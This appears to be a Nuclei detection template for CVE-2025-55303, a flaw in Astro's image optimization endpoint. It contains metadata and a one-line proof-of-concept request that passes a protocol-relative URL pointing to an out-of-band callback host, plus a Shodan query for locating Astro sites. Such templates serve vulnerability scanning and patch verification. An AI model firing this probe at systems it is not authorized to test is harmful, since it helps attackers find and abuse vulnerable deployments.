Astro < 5.13.2 and < 4.16.18 contains an information disclosure vulnerability caused by improper validation of protocol-relative URLs in the image optimization endpoint, letting attackers serve images from unauthorized third-party domains, exploit requires on-demand rendering deployment.
PoC代码[已公开]
id: CVE-2025-55303
info:
name: Astro - Unauthorized Third-Party Image Access
author: theamanrawat
severity: medium
description: |
Astro < 5.13.2 and < 4.16.18 contains an information disclosure vulnerability caused by improper validation of protocol-relative URLs in the image optimization endpoint, letting attackers serve images from unauthorized third-party domains, exploit requires on-demand rendering deployment.
impact: |
Attackers can serve images from unauthorized third-party domains, potentially leading to information disclosure or content spoofing.
remediation: |
Update to versions 5.13.2 or 4.16.18 or later.
reference:
- https://github.com/advisories/GHSA-xf8x-j4p2-f749
- https://nvd.nist.gov/vuln/detail/CVE-2025-55303
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
cvss-score: 6.4
cve-id: CVE-2025-55303
epss-score: 0.00009
epss-percentile: 0.00668
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: http.html:"astro"
tags: cve,cve2025,astro,ssrf,vuln
http:
- method: GET
path:
- "{{BaseURL}}/_image?href=//{{interactsh-url}}/600x400"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'interactsh_protocol == "http"'
- 'contains(header, "image/")'
condition: and
# digest: 4a0a004730450221008a847b57d26b0fd53ac33637ba7344a6f9b4cd89ae15040ebbc314a3c5d5ccff0220350429922122995b716db418c2d51f2af70ad18f184b67799be76da9bda8950f:922c64590222798bb761d5b6d8e72950